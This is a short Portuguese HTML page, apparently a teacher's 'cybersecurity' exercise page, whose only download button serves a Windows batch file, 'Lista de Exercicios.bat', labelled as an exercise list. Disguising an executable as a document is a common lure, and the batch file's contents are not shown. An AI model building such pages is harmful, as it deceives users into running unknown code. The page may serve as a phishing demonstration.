<!DOCTYPE html>
<html lang="pt-br">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Prof Joao Exercicios</title>
    <link rel="shortcut icon" href="icon.png">

    <link rel="stylesheet">
    <style>
        body {
    font-family: Arial, sans-serif;
    margin: 0;
    padding: 20px;
}

.container {
    max-width: 500px;
    margin: 0 auto;
    text-align: center;
}

h1 {
    font-size: 24px;
    margin-top: 0;
}

p {
    margin-bottom: 20px;
}

button {
    font-size: 16px;
    padding: 10px 20px;
    border: 1px solid #ccc;
    border-radius: 4px;
    background-color: #fff;
    color: #333;
    cursor: pointer;
}

button:hover {
    background-color: #ddd;
}
.iconn{
    height: 60px;
    margin-left: 47%;
}

    </style>
</head>
<body>
    <br>
    <br>
    <br>
    <br>
    <br>
    <img class="iconn" src="icon.png">
    <div class="container">
        <h1>Segurança cibernetica</h1>
        <p>Clique no botão abaixo para baixar a Lista de Exercicios.</p>
        <a alt="Lista de Exercicios" href="Lista de Exercicios.bat" download>
            <button>Baixar</button>
        </a>
    </div>
</body>
</html>
